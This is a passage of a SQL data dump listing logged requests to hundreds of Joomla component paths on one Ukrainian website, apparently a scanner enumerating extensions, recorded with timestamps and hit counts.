00:00:00',301),(18811,'https://ekvatorprint.com.ua/components/com_swmenufree4',NULL,'','',1,0,'2021-03-01 13:53:59','0000-00-00 00:00:00',301),(18812,'https://ekvatorprint.com.ua/components/com_komento',NULL,'','',1,0,'2021-03-01 13:54:00','0000-00-00 00:00:00',301),(18813,'https://ekvatorprint.com.ua/components/com_clickheat',NULL,'','',1,0,'2021-03-01 13:54:00','0000-00-00 00:00:00',301),(18814,'https://ekvatorprint.com.ua/components/com_visa',NULL,'','',1,0,'2021-03-01 13:54:00','0000-00-00 00:00:00',301),(18815,'https://ekvatorprint.com.ua/components/com_maianmedia',NULL,'','',1,0,'2021-03-01 13:54:00','0000-00-00 00:00:00',301),(18816,'https://ekvatorprint.com.ua/components/com_fm',NULL,'','',1,0,'2021-03-01 13:54:00','0000-00-00 00:00:00',301),(18817,'https://ekvatorprint.com.ua/components/com_saxumnumerology',NULL,'','',1,0,'2021-03-01 13:54:01','0000-00-00 00:00:00',301),(18818,'https://ekvatorprint.com.ua/components/com_jtagcalendar',NULL,'','',1,0,'2021-03-01 13:54:01','0000-00-00 00:00:00',301),(18819,'https://ekvatorprint.com.ua/components/com_awdwall',NULL,'','',1,0,'2021-03-01 13:54:01','0000-00-00 00:00:00',301),(18820,'https://ekvatorprint.com.ua/components/com_jux_eventon',NULL,'','',1,0,'2021-03-01 13:54:01','0000-00-00 00:00:00',301),(18821,'https://ekvatorprint.com.ua/components/com_catfiltering',NULL,'','',1,0,'2021-03-01 13:54:02','0000-00-00 00:00:00',301),(18822,'https://ekvatorprint.com.ua/components/com_classified',NULL,'','',1,0,'2021-03-01 13:54:02','0000-00-00 00:00:00',301),(18823,'https://ekvatorprint.com.ua/components/com_crhotels',NULL,'','',1,0,'2021-03-01 13:54:02','0000-00-00 00:00:00',301),(18824,'https://ekvatorprint.com.ua/components/com_multitier',NULL,'','',1,0,'2021-03-01 13:54:02','0000-00-00 00:00:00',301),(18825,'https://ekvatorprint.com.ua/components/com_mad4joomla',NULL,'','',1,0,'2021-03-01 13:54:03','0000-00-00 00:00:00',301),(18826,'https://ekvatorprint.com.ua/components/com_flash',NULL,'','',1,0,'2021-03-01 13:54:03','0000-00-00 00:00:00',301),(18827,'https://ekvatorprint.com.ua/components/com_tree',NULL,'','',1,0,'2021-03-01 13:54:03','0000-00-00 00:00:00',301),(18828,'https://ekvatorprint.com.ua/components/com_recipe',NULL,'','',1,0,'2021-03-01 13:54:03','0000-00-00 00:00:00',301),(18829,'https://ekvatorprint.com.ua/components/com_seyret',NULL,'','',1,0,'2021-03-01 13:54:04','0000-00-00 00:00:00',301),(18830,'https://ekvatorprint.com.ua/components/com_ijoomla_rss',NULL,'','',2,0,'2021-03-01 13:54:04','0000-00-00 00:00:00',301),(18831,'https://ekvatorprint.com.ua/components/com_jepaypervideo',NULL,'','',1,0,'2021-03-01 13:54:04','0000-00-00 00:00:00',301),(18832,'https://ekvatorprint.com.ua/components/com_jequizmanagement',NULL,'','',1,0,'2021-03-01 13:54:04','0000-00-00 00:00:00',301),(18833,'https://ekvatorprint.com.ua/components/com_surveymanager',NULL,'','',1,0,'2021-03-01 13:54:04','0000-00-00 00:00:00',301),(18834,'https://ekvatorprint.com.ua/components/com_jmsmusic',NULL,'','',1,0,'2021-03-01 13:54:05','0000-00-00 00:00:00',301),(18835,'https://ekvatorprint.com.ua/components/com_aysquiz',NULL,'','',1,0,'2021-03-01 13:54:05','0000-00-00 00:00:00',301),(18836,'https://ekvatorprint.com.ua/components/com_mailarchive',NULL,'','',1,0,'2021-03-01 13:54:05','0000-00-00 00:00:00',301),(18837,'https://ekvatorprint.com.ua/components/com_gmaps',NULL,'','',1,0,'2021-03-01 13:54:05','0000-00-00 00:00:00',301),(18838,'https://ekvatorprint.com.ua/components/com_newsflash',NULL,'','',1,0,'2021-03-01 13:54:06','0000-00-00 00:00:00',301),(18839,'https://ekvatorprint.com.ua/components/com_kbase',NULL,'','',1,0,'2021-03-01 13:54:06','0000-00-00 00:00:00',301),(18840,'https://ekvatorprint.com.ua/components/com_mydyngallery',NULL,'','',1,0,'2021-03-01 13:54:06','0000-00-00 00:00:00',301),(18841,'https://ekvatorprint.com.ua/components/com_question',NULL,'','',1,0,'2021-03-01 13:54:06','0000-00-00 00:00:00',301),(18842,'https://ekvatorprint.com.ua/components/com_profiler',NULL,'','',1,0,'2021-03-01 13:54:06','0000-00-00 00:00:00',301),(18843,'https://ekvatorprint.com.ua/components/com_intuit',NULL,'','',1,0,'2021-03-01 13:54:07','0000-00-00 00:00:00',301),(18844,'https://ekvatorprint.com.ua/components/com_creativecontactform',NULL,'','',1,0,'2021-03-01 13:54:07','0000-00-00 00:00:00',301),(18845,'https://ekvatorprint.com.ua/components/com_photocontest',NULL,'','',1,0,'2021-03-01 13:54:07','0000-00-00 00:00:00',301),(18846,'https://ekvatorprint.com.ua/components/com_igallery',NULL,'','',1,0,'2021-03-01 13:54:08','0000-00-00 00:00:00',301),(18847,'https://ekvatorprint.com.ua/components/com_manager',NULL,'','',1,0,'2021-03-01 13:54:08','0000-00-00 00:00:00',301),(18848,'https://ekvatorprint.com.ua/components/com_rokdownloads',NULL,'','',1,0,'2021-03-01 13:54:08','0000-00-00 00:00:00',301),(18849,'https://ekvatorprint.com.ua/components/com_jhotelreservation',NULL,'','',1,0,'2021-03-01 13:54:08','0000-00-00 00:00:00',301),(18850,'https://ekvatorprint.com.ua/components/com_jsptickets',NULL,'','',1,0,'2021-03-01 13:54:08','0000-00-00 00:00:00',301),(18851,'https://ekvatorprint.com.ua/components/com_catalogproduction',NULL,'','',1,0,'2021-03-01 13:54:09','0000-00-00 00:00:00',301),(18852,'https://ekvatorprint.com.ua/components/com_jfeedback',NULL,'','',1,0,'2021-03-01 13:54:09','0000-00-00 00:00:00',301),(18853,'https://ekvatorprint.com.ua/components/com_easyfaq',NULL,'','',1,0,'2021-03-01 13:54:09','0000-00-00 00:00:00',301),(18854,'https://ekvatorprint.com.ua/components/com_multimap',NULL,'','',1,0,'2021-03-01 13:54:09','0000-00-00 00:00:00',301),(18855,'https://ekvatorprint.com.ua/components/com_joomsport',NULL,'','',1,0,'2021-03-01 13:54:10','0000-00-00 00:00:00',301),(18856,'https://ekvatorprint.com.ua/components/com_docman',NULL,'','',1,0,'2021-03-01 13:54:10','0000-00-00 00:00:00',301),(18857,'https://ekvatorprint.com.ua/components/com_cartikads',NULL,'','',1,0,'2021-03-01 13:54:10','0000-00-00 00:00:00',301),(18858,'https://ekvatorprint.com.ua/components/com_music',NULL,'','',1,0,'2021-03-01 13:54:10','0000-00-00 00:00:00',301),(18859,'https://ekvatorprint.com.ua/components/com_king',NULL,'','',1,0,'2021-03-01 13:54:10','0000-00-00 00:00:00',301),(18860,'https://ekvatorprint.com.ua/components/com_d3000',NULL,'','',1,0,'2021-03-01 13:54:11','0000-00-00 00:00:00',301),(18861,'https://ekvatorprint.com.ua/components/com_bsqsitestats',NULL,'','',1,0,'2021-03-01 13:54:11','0000-00-00 00:00:00',301),(18862,'https://ekvatorprint.com.ua/components/com_ijoomla',NULL,'','',1,0,'2021-03-01 13:54:11','0000-00-00 00:00:00',301),(18863,'https://ekvatorprint.com.ua/components/com_hotel',NULL,'','',1,0,'2021-03-01 13:54:11','0000-00-00 00:00:00',301),(18864,'https://ekvatorprint.com.ua/components/com_tickets',NULL,'','',1,0,'2021-03-01 13:54:12','0000-00-00 00:00:00',301),(18865,'https://ekvatorprint.com.ua/components/com_products',NULL,'','',1,0,'2021-03-01 13:54:12','0000-00-00 00:00:00',301),(18866,'https://ekvatorprint.com.ua/components/com_joomlavvz',NULL,'','',2,0,'2021-03-01 13:54:12','0000-00-00 00:00:00',301),(18867,'https://ekvatorprint.com.ua/components/com_linkr',NULL,'','',1,0,'2021-03-01 13:54:12','0000-00-00 00:00:00',301),(18868,'https://ekvatorprint.com.ua/components/com_jemediaplayer',NULL,'','',1,0,'2021-03-01 13:54:12','0000-00-00 00:00:00',301),(18869,'https://ekvatorprint.com.ua/components/com_ccinvoices',NULL,'','',1,0,'2021-03-01 13:54:13','0000-00-00 00:00:00',301),(18870,'https://ekvatorprint.com.ua/components/com_jevideorate',NULL,'','',1,0,'2021-03-01 13:54:13','0000-00-00 00:00:00',301),(18871,'https://ekvatorprint.com.ua/components/com_tag',NULL,'','',1,0,'2021-03-01 13:54:13','0000-00-00 00:00:00',301),(18872,'https://ekvatorprint.com.ua/components/com_simplefaq',NULL,'','',1,0,'2021-03-01 13:54:13','0000-00-00 00:00:00',301),(18873,'https://ekvatorprint.com.ua/components/com_wallpapers',NULL,'','',1,0,'2021-03-01 13:54:14','0000-00-00 00:00:00',301),(18874,'https://ekvatorprint.com.ua/components/com_tariff',NULL,'','',1,0,'2021-03-01 13:54:14','0000-00-00 00:00:00',301),(18875,'https://ekvatorprint.com.ua/components/com_vikrentitems',NULL,'','',1,0,'2021-03-01 13:54:14','0000-00-00 00:00:00',301),(18876,'https://ekvatorprint.com.ua/components/com_onevote',NULL,'','',1,0,'2021-03-01 13:54:14','0000-00-00 00:00:00',301),(18877,'https://ekvatorprint.com.ua/components/com_soundset',NULL,'','',1,0,'2021-03-01 13:54:14','0000-00-00 00:00:00',301),(18878,'https://ekvatorprint.com.ua/components/com_k2',NULL,'','',2,0,'2021-03-01 13:54:15','0000-00-00 00:00:00',301),(18879,'https://ekvatorprint.com.ua/components/com_flashmagazinedeluxe',NULL,'','',1,0,'2021-03-01 13:54:15','0000-00-00 00:00:00',301),(18880,'https://ekvatorprint.com.ua/components/com_visualcalendar',NULL,'','',1,0,'2021-03-01 13:54:15','0000-00-00 00:00:00',301),(18881,'https://ekvatorprint.com.ua/components/com_incapsula',NULL,'','',1,0,'2021-03-01 13:54:15','0000-00-00 00:00:00',301),(18882,'https://ekvatorprint.com.ua/components/com_tax',NULL,'','',1,0,'2021-03-01 13:54:16','0000-00-00 00:00:00',301),(18883,'https://ekvatorprint.com.ua/components/com_gk3_photoslide',NULL,'','',1,0,'2021-03-01 13:54:16','0000-00-00 00:00:00',301),(18884,'https://ekvatorprint.com.ua/components/com_ezautos',NULL,'','',1,0,'2021-03-01 13:54:16','0000-00-00 00:00:00',301),(18885,'https://ekvatorprint.com.ua/components/com_jpack',NULL,'','',1,0,'2021-03-01 13:54:16','0000-00-00 00:00:00',301),(18886,'https://ekvatorprint.com.ua/components/com_phpbridge',NULL,'','',1,0,'2021-03-01 13:54:17','0000-00-00 00:00:00',301),(18887,'https://ekvatorprint.com.ua/components/com_reservations',NULL,'','',1,0,'2021-03-01 13:54:17','0000-00-00 00:00:00',301),(18888,'https://ekvatorprint.com.ua/components/com_jashowcase',NULL,'','',1,0,'2021-03-01 13:54:17','0000-00-00 00:00:00',301),(18889,'https://ekvatorprint.com.ua/components/com_jomholiday',NULL,'','',1,0,'2021-03-01 13:54:17','0000-00-00 00:00:00',301),(18890,'https://ekvatorprint.com.ua/components/com_ice',NULL,'','',1,0,'2021-03-01 13:54:17','0000-00-00 00:00:00',301),(18891,'https://ekvatorprint.com.ua/components/com_sponsorwall',NULL,'','',1,0,'2021-03-01 13:54:18','0000-00-00 00:00:00',301),(18892,'https://ekvatorprint.com.ua/components/com_perchaimageattach',NULL,'','',1,0,'2021-03-01 13:54:18','0000-00-00 00:00:00',301),(18893,'https://ekvatorprint.com.ua/components/com_jim',NULL,'','',1,0,'2021-03-01 13:54:18','0000-00-00 00:00:00',301),(18894,'https://ekvatorprint.com.ua/components/com_proofreader',NULL,'','',1,0,'2021-03-01 13:54:18','0000-00-00 00:00:00',301),(18895,'https://ekvatorprint.com.ua/components/com_ns_downloadshop',NULL,'','',1,0,'2021-03-01 13:54:19','0000-00-00 00:00:00',301),(18896,'https://ekvatorprint.com.ua/components/com_firmy',NULL,'','',1,0,'2021-03-01 13:54:19','0000-00-00 00:00:00',301),(18897,'https://ekvatorprint.com.ua/components/com_panoramic',NULL,'','',1,0,'2021-03-01 13:54:19','0000-00-00 00:00:00',301),(18898,'https://ekvatorprint.com.ua/components/com_joomtouch',NULL,'','',1,0,'2021-03-01 13:54:19','0000-00-00 00:00:00',301),(18899,'https://ekvatorprint.com.ua/components/com_vikbooking',NULL,'','',1,0,'2021-03-01 13:54:19','0000-00-00 00:00:00',301),(18900,'https://ekvatorprint.com.ua/components/com_colophon',NULL,'','',1,0,'2021-03-01 13:54:20','0000-00-00 00:00:00',301),(18901,'https://ekvatorprint.com.ua/components/com_webhosting',NULL,'','',1,0,'2021-03-01 13:54:20','0000-00-00 00:00:00',301),(18902,'https://ekvatorprint.com.ua/components/com_color',NULL,'','',1,0,'2021-03-01 13:54:20','0000-00-00 00:00:00',301),(18903,'https://ekvatorprint.com.ua/components/com_etree',NULL,'','',1,0,'2021-03-01 13:54:20','0000-00-00 00:00:00',301),(18904,'https://ekvatorprint.com.ua/components/com_zoomportfolio',NULL,'','',1,0,'2021-03-01 13:54:21','0000-00-00 00:00:00',301),(18905,'https://ekvatorprint.com.ua/components/com_jeclassifyads',NULL,'','',1,0,'2021-03-01 13:54:21','0000-00-00 00:00:00',301),(18906,'https://ekvatorprint.com.ua/components/com_paxgallery',NULL,'','',1,0,'2021-03-01 13:54:21','0000-00-00 00:00:00',301),(18907,'https://ekvatorprint.com.ua/components/com_spmoviedb',NULL,'','',1,0,'2021-03-01 13:54:21','0000-00-00 00:00:00',301),(18908,'https://ekvatorprint.com.ua/components/com_trading',NULL,'','',1,0,'2021-03-01 13:54:21','0000-00-00 00:00:00',301),(18909,'https://ekvatorprint.com.ua/components/com_weberpcustomer',NULL,'','',1,0,'2021-03-01 13:54:22','0000-00-00 00:00:00',301),(18910,'https://ekvatorprint.com.ua/components/com_mtree',NULL,'','',1,0,'2021-03-01 13:54:22','0000-00-00 00:00:00',301),(18911,'https://ekvatorprint.com.ua/components/com_checklist',NULL,'','',1,0,'2021-03-01 13:54:22','0000-00-00 00:00:00',301),(18912,'https://ekvatorprint.com.ua/components/com_mambelfish',NULL,'','',1,0,'2021-03-01 13:54:22','0000-00-00 00:00:00',301),(18913,'https://ekvatorprint.com.ua/components/com_be',NULL,'','',1,0,'2021-03-01 13:54:23','0000-00-00 00:00:00',301),(18914,'https://ekvatorprint.com.ua/components/com_bayesiannaivefilter',NULL,'','',1,0,'2021-03-01 13:54:23','0000-00-00 00:00:00',301),(18915,'https://ekvatorprint.com.ua/components/com_photomapgallery',NULL,'','',1,0,'2021-03-01 13:54:23','0000-00-00 00:00:00',301),(18916,'https://ekvatorprint.com.ua/components/com_videowhisper_2wvc',NULL,'','',1,0,'2021-03-01 13:54:23','0000-00-00 00:00:00',301),(18917,'https://ekvatorprint.com.ua/components/com_joommail',NULL,'','',1,0,'2021-03-01 13:54:23','0000-00-00 00:00:00',301),(18918,'https://ekvatorprint.com.ua/components/com_jticketing',NULL,'','',1,0,'2021-03-01 13:54:24','0000-00-00 00:00:00',301),(18919,'https://ekvatorprint.com.ua/components/com_ksadvertiser',NULL,'','',1,0,'2021-03-01 13:54:24','0000-00-00 00:00:00',301),(18920,'https://ekvatorprint.com.ua/components/com_br',NULL,'','',1,0,'2021-03-01 13:54:24','0000-00-00 00:00:00',301),(18921,'https://ekvatorprint.com.ua/components/com_product',NULL,'','',1,0,'2021-03-01 13:54:24','0000-00-00 00:00:00',301),(18922,'https://ekvatorprint.com.ua/components/com_sebercart',NULL,'','',1,0,'2021-03-01 13:54:25','0000-00-00 00:00:00',301),(18923,'https://ekvatorprint.com.ua/components/com_jtickets',NULL,'','',1,0,'2021-03-01 13:54:25','0000-00-00 00:00:00',301),(18924,'https://ekvatorprint.com.ua/components/com_delicious',NULL,'','',1,0,'2021-03-01 13:54:25','0000-00-00 00:00:00',301),(18925,'https://ekvatorprint.com.ua/components/com_restaurantguide',NULL,'','',1,0,'2021-03-01 13:54:25','0000-00-00 00:00:00',301),(18926,'https://ekvatorprint.com.ua/components/com_ops',NULL,'','',1,0,'2021-03-01 13:54:25','0000-00-00 00:00:00',301),(18927,'https://ekvatorprint.com.ua/components/com_cmotour',NULL,'','',1,0,'2021-03-01 13:54:26','0000-00-00 00:00:00',301),(18928,'https://ekvatorprint.com.ua/components/com_kochsuite',NULL,'','',1,0,'2021-03-01 13:54:26','0000-00-00 00:00:00',301),(18929,'https://ekvatorprint.com.ua/components/com_jpodium',NULL,'','',1,0,'2021-03-01 13:54:26','0000-00-00 00:00:00',301),(18930,'https://ekvatorprint.com.ua/components/com_zhbaidumap',NULL,'','',1,0,'2021-03-01 13:54:26','0000-00-00 00:00:00',301),(18931,'https://ekvatorprint.com.ua/components/com_projects',NULL,'','',1,0,'2021-03-01 13:54:27','0000-00-00 00:00:00',301),(18932,'https://ekvatorprint.com.ua/components/com_abbrev',NULL,'','',1,0,'2021-03-01 13:54:27','0000-00-00 00:00:00',301),(18933,'https://ekvatorprint.com.ua/components/com_contushdvideoshare',NULL,'','',1,0,'2021-03-01 13:54:27','0000-00-00 00:00:00',301),(18934,'https://ekvatorprint.com.ua/components/com_jwmmxtd',NULL,'','',1,0,'2021-03-01 13:54:27','0000-00-00 00:00:00',301),(18935,'https://ekvatorprint.com.ua/components/com_if_surfalert',NULL,'','',1,0,'2021-03-01 13:54:27','0000-00-00 00:00:00',301),(18936,'https://ekvatorprint.com.ua/components/com_smartsite',NULL,'','',1,0,'2021-03-01 13:54:28','0000-00-00 00:00:00',301),(18937,'https://ekvatorprint.com.ua/components/com_joomdle',NULL,'','',1,0,'2021-03-01 13:54:28','0000-00-00 00:00:00',301),(18938,'https://ekvatorprint.com.ua/components/com_actions',NULL,'','',1,0,'2021-03-01 13:54:28','0000-00-00 00:00:00',301),(18939,'https://ekvatorprint.com.ua/components/com_timetable',NULL,'','',1,0,'2021-03-01 13:54:28','0000-00-00 00:00:00',301),(18940,'https://ekvatorprint.com.ua/components/com_joomloads',NULL,'','',1,0,'2021-03-01 13:54:29','0000-00-00 00:00:00',301),(18941,'https://ekvatorprint.com.ua/components/com_wmtpic',NULL,'','',1,0,'2021-03-01 13:54:29','0000-00-00 00:00:00',301),(18942,'https://ekvatorprint.com.ua/components/com_videoflow',NULL,'','',1,0,'2021-03-01 13:54:29','0000-00-00 00:00:00',301),(18943,'https://ekvatorprint.com.ua/components/com_communityquiz',NULL,'','',1,0,'2021-03-01 13:54:29','0000-00-00 00:00:00',301),(18944,'https://ekvatorprint.com.ua/components/com_controller',NULL,'','',1,0,'2021-03-01 13:54:29','0000-00-00 00:00:00',301),(18945,'https://ekvatorprint.com.ua/components/com_puarcade',NULL,'','',1,0,'2021-03-01 13:54:30','0000-00-00 00:00:00',301),(18946,'https://ekvatorprint.com.ua/components/com_techfolio',NULL,'','',1,0,'2021-03-01 13:54:30','0000-00-00 00:00:00',301),(18947,'https://ekvatorprint.com.ua/components/com_jquarks4s',NULL,'','',1,0,'2021-03-01 13:54:30','0000-00-00 00:00:00',301),(18948,'https://ekvatorprint.com.ua/components/com_jbcatalog',NULL,'','',1,0,'2021-03-01 13:54:31','0000-00-00 00:00:00',301),(18949,'https://ekvatorprint.com.ua/components/com_konsultasi',NULL,'','',1,0,'2021-03-01 13:54:31','0000-00-00 00:00:00',301),(18950,'https://ekvatorprint.com.ua/components/com_performs',NULL,'','',1,0,'2021-03-01 13:54:31','0000-00-00 00:00:00',301),(18951,'https://ekvatorprint.com.ua/components/com_phpshop',NULL,'','',1,0,'2021-03-01 13:54:31','0000-00-00 00:00:00',301),(18952,'https://ekvatorprint.com.ua/components/com_jreactions',NULL,'','',1,0,'2021-03-01 13:54:32','0000-00-00 00:00:00',301),(18953,'https://ekvatorprint.com.ua/components/com_upl',NULL,'','',1,0,'2021-03-01 13:54:32','0000-00-00 00:00:00',301),(18954,'https://ekvatorprint.com.ua/components/com_maplocator',NULL,'','',1,0,'2021-03-01 13:54:32','0000-00-00 00:00:00',301),(18955,'https://ekvatorprint.com.ua/components/com_annonces',NULL,'','',1,0,'2021-03-01 13:54:33','0000-00-00 00:00:00',301),(18956,'https://ekvatorprint.com.ua/components/com_xeslidegalfx',NULL,'','',1,0,'2021-03-01 13:54:33','0000-00-00 00:00:00',301),(18957,'https://ekvatorprint.com.ua/components/com_eventcal',NULL,'','',1,0,'2021-03-01 13:54:33','0000-00-00 00:00:00',301),(18958,'https://ekvatorprint.com.ua/components/com_joovideo',NULL,'','',1,0,'2021-03-01 13:54:33','0000-00-00 00:00:00',301),(18959,'https://ekvatorprint.com.ua/components/com_jfbconnect',NULL,'','',1,0,'2021-03-01 13:54:33','0000-00-00 00:00:00',301),(18960,'https://ekvatorprint.com.ua/components/com_mscomment',NULL,'','',1,0,'2021-03-01 13:54:34','0000-00-00 00:00:00',301),(18961,'https://ekvatorprint.com.ua/components/com_flexicontent',NULL,'','',1,0,'2021-03-01 13:54:34','0000-00-00 00:00:00',301),(18962,'https://ekvatorprint.com.ua/components/com_bookjoomlas',NULL,'','',2,0,'2021-03-01 13:54:34','0000-00-00 00:00:00',301),(18963,'https://ekvatorprint.com.ua/components/com_lurm_constructor',NULL,'','',1,0,'2021-03-01 13:54:34','0000-00-00 00:00:00',301),(18964,'https://ekvatorprint.com.ua/components/com_prime',NULL,'','',1,0,'2021-03-01 13:54:35','0000-00-00 00:00:00',301),(18965,'https://ekvatorprint.com.ua/components/com_youtubegallery',NULL,'','',1,0,'2021-03-01 13:54:35','0000-00-00 00:00:00',301),(18966,'https://ekvatorprint.com.ua/components/com_casinobase',NULL,'','',1,0,'2021-03-01 13:54:35','0000-00-00 00:00:00',301),(18967,'https://ekvatorprint.com.ua/components/com_joodb',NULL,'','',1,0,'2021-03-01 13:54:35','0000-00-00 00:00:00',301),(18968,'https://ekvatorprint.com.ua/components/com_uniterevolution2',NULL,'','',1,0,'2021-03-01 13:54:35','0000-00-00 00:00:00',301),(18969,'https://ekvatorprint.com.ua/components/com_redtwitter',NULL,'','',1,0,'2021-03-01 13:54:36','0000-00-00 00:00:00',301),(18970,'https://ekvatorprint.com.ua/components/com_eportfolio',NULL,'','',1,0,'2021-03-01 13:54:36','0000-00-00 00:00:00',301),(18971,'https://ekvatorprint.com.ua/components/com_jvotesystem',NULL,'','',1,0,'2021-03-01 13:54:36','0000-00-00 00:00:00',301),(18972,'https://ekvatorprint.com.ua/components/com_saxumpicker',NULL,'','',1,0,'2021-03-01 13:54:36','0000-00-00 00:00:00',301),(18973,'https://ekvatorprint.com.ua/components/com_dateconverter',NULL,'','',1,0,'2021-03-01 13:54:37','0000-00-00 00:00:00',301),(18974,'https://ekvatorprint.com.ua/components/com_mediqna',NULL,'','',1,0,'2021-03-01 13:54:37','0000-00-00 00:00:00',301),(18975,'https://ekvatorprint.com.ua/components/com_mmp',NULL,'','',1,0,'2021-03-01 13:54:37','0000-00-00 00:00:00',301),(18976,'https://ekvatorprint.com.ua/components/com_biitatemplateshop',NULL,'','',1,0,'2021-03-01 13:54:37','0000-00-00 00:00:00',301),(18977,'https://ekvatorprint.com.ua/components/com_garyscookbook',NULL,'','',1,0,'2021-03-01 13:54:37','0000-00-00 00:00:00',301),(18978,'https://ekvatorprint.com.ua/components/com_eventing',NULL,'','',2,0,'2021-03-01 13:54:38','0000-00-00 00:00:00',301),(18979,'https://ekvatorprint.com.ua/components/com_streetguess',NULL,'','',1,0,'2021-03-01 13:54:38','0000-00-00 00:00:00',301),(18980,'https://ekvatorprint.com.ua/components/com_awd_song',NULL,'','',1,0,'2021-03-01 13:54:38','0000-00-00 00:00:00',301),(18981,'https://ekvatorprint.com.ua/components/com_media_library',NULL,'','',1,0,'2021-03-01 13:54:38','0000-00-00 00:00:00',301),(18982,'https://ekvatorprint.com.ua/components/com_jtm',NULL,'','',1,0,'2021-03-01 13:54:39','0000-00-00 00:00:00',301),(18983,'https://ekvatorprint.com.ua/components/com_machine',NULL,'','',1,0,'2021-03-01 13:54:39','0000-00-00 00:00:00',301),(18984,'https://ekvatorprint.com.ua/components/com_img',NULL,'','',1,0,'2021-03-01 13:54:39','0000-00-00 00:00:00',301),(18985,'https://ekvatorprint.com.ua/components/com_joomloc',NULL,'','',1,0,'2021-03-01 13:54:39','0000-00-00 00:00:00',301),(18986,'https://ekvatorprint.com.ua/components/com_xfaq',NULL,'','',1,0,'2021-03-01 13:54:39','0000-00-00 00:00:00',301),(18987,'https://ekvatorprint.com.ua/components/com_jb2',NULL,'','',1,0,'2021-03-01 13:54:40','0000-00-00 00:00:00',301),(18988,'https://ekvatorprint.com.ua/components/com_agenda',NULL,'','',1,0,'2021-03-01 13:54:40','0000-00-00 00:00:00',301),(18989,'https://ekvatorprint.com.ua/components/com_joomlaflashfun',NULL,'','',1,0,'2021-03-01 13:54:40','0000-00-00 00:00:00',301),(18990,'https://ekvatorprint.com.ua/components/com_ensenanzas',NULL,'','',1,0,'2021-03-01 13:54:40','0000-00-00 00:00:00',301),(18991,'https://ekvatorprint.com.ua/components/com_rsappt_pro2',NULL,'','',1,0,'2021-03-01 13:54:41','0000-00-00 00:00:00',301),(18992,'https://ekvatorprint.com.ua/components/com_lmo',NULL,'','',1,0,'2021-03-01 13:54:41','0000-00-00 00:00:00',301),(18993,'https://ekvatorprint.com.ua/components/com_joobb',NULL,'','',1,0,'2021-03-01 13:54:41','0000-00-00 00:00:00',301),(18994,'https://ekvatorprint.com.ua/components/com_simplecalendar',NULL,'','',1,0,'2021-03-01 13:54:41','0000-00-00 00:00:00',301),(18995,'https://ekvatorprint.com.ua/components/com_avreloaded',NULL,'','',1,0,'2021-03-01 13:54:41','0000-00-00 00:00:00',301),(18996,'https://ekvatorprint.com.ua/components/com_healthstats',NULL,'','',1,0,'2021-03-01 13:54:42','0000-00-00 00:00:00',301),(18997,'https://ekvatorprint.com.ua/components/com_reporter',NULL,'','',1,0,'2021-03-01 13:54:42','0000-00-00 00:00:00',301),(18998,'https://ekvatorprint.com.ua/components/com_hdflvplayer',NULL,'','',1,0,'2021-03-01 13:54:42','0000-00-00 00:00:00',301),(18999,'https://ekvatorprint.com.ua/components/com_dms',NULL,'','',1,0,'2021-03-01 13:54:43','0000-00-00 00:00:00',301),(19000,'https://ekvatorprint.com.ua/components/com_bookmarks',NULL,'','',1,0,'2021-03-01 13:54:43','0000-00-00 00:00:00',301),(19001,'https://ekvatorprint.com.ua/components/com_joomlapicasa2',NULL,'','',1,0,'2021-03-01 13:54:43','0000-00-00 00:00:00',301),(19002,'https://ekvatorprint.com.ua/components/com_record',NULL,'','',1,0,'2021-03-01 13:54:43','0000-00-00 00:00:00',301),(19003,'https://ekvatorprint.com.ua/components/com_sar_news',NULL,'','',1,0,'2021-03-01 13:54:43','0000-00-00 00:00:00',301),(19004,'https://ekvatorprint.com.ua/components/com_ewriting',NULL,'','',1,0,'2021-03-01 13:54:44','0000-00-00 00:00:00',301),(19005,'https://ekvatorprint.com.ua/components/com_d',NULL,'','',1,0,'2021-03-01 13:54:44','0000-00-00 00:00:00',301),(19006,'https://ekvatorprint.com.ua/components/com_sermon',NULL,'','',1,0,'2021-03-01 13:54:44','0000-00-00 00:00:00',301),(19007,'https://ekvatorprint.com.ua/components/com_j',NULL,'','',1,0,'2021-03-01 13:54:44','0000-00-00 00:00:00',301),(19008,'https://ekvatorprint.com.ua/components/com_n',NULL,'','',1,0,'2021-03-01 13:54:45','0000-00-00 00:00:00',301),(19009,'https://ekvatorprint.com.ua/components/com_akogallery',NULL,'','',1,0,'2021-03-01 13:54:45','0000-00-00 00:00:00',301),(19010,'https://ekvatorprint.com.ua/components/com_availcal',NULL,'','',1,0,'2021-03-01 13:54:45','0000-00-00 00:00:00',301),(19011,'https://ekvatorprint.com.ua/components/com_projectlog',NULL,'','',1,0,'2021-03-01 13:54:45','0000-00-00 00:00:00',301),(19012,'https://ekvatorprint.com.ua/components/com_jfuploader',NULL,'','',1,0,'2021-03-01 13:54:46','0000-00-00 00:00:00',301),(19013,'https://ekvatorprint.com.ua/components/com_jeemasms',NULL,'','',1,0,'2021-03-01 13:54:46','0000-00-00 00:00:00',301),(19014,'https://ekvatorprint.com.ua/components/com_cmimarketplace',NULL,'','',1,0,'2021-03-01 13:54:47','0000-00-00 00:00:00',301),(19015,'https://ekvatorprint.com.ua/components/com_directorix',NULL,'','',1,0,'2021-03-01 13:54:47','0000-00-00 00:00:00',301),(19016,'https://ekvatorprint.com.ua/components/com_bit',NULL,'','',1,0,'2021-03-01 13:54:47','0000-00-00 00:00:00',301),(19017,'https://ekvatorprint.com.ua/components/com_actualite',NULL,'','',1,0,'2021-03-01 13:54:47','0000-00-00 00:00:00',301),(19018,'https://ekvatorprint.com.ua/components/com_easyblog',NULL,'','',1,0,'2021-03-01 13:54:48','0000-00-00 00:00:00',301),(19019,'https://ekvatorprint.com.ua/components/com_omphotogallery',NULL,'','',1,0,'2021-03-01 13:54:48','0000-00-00 00:00:00',301),(19020,'https://ekvatorprint.com.ua/components/com_j-projects',NULL,'','',1,0,'2021-03-01 13:54:48','0000-00-00 00:00:00',301),(19021,'https://ekvatorprint.com.ua/components/com_bfsurvey_profree',NULL,'','',1,0,'2021-03-01 13:54:48','0000-00-00 00:00:00',301),(19022,'https://ekvatorprint.com.ua/components/com_lucygames',NULL,'','',1,0,'2021-03-01 13:54:48','0000-00-00 00:00:00',301),(19023,'https://ekvatorprint.com.ua/components/com_vehiclemanager',NULL,'','',1,0,'2021-03-01 13:54:49','0000-00-00 00:00:00',301),(19024,'https://ekvatorprint.com.ua/components/com_cbresumebuilder',NULL,'','',1,0,'2021-03-01 13:54:49','0000-00-00 00:00:00',301),(19025,'https://ekvatorprint.com.ua/components/com_start',NULL,'','',1,0,'2021-03-01 13:54:49','0000-00-00 00:00:00',301),(19026,'https://ekvatorprint.com.ua/components/com_television',NULL,'','',1,0,'2021-03-01 13:54:49','0000-00-00 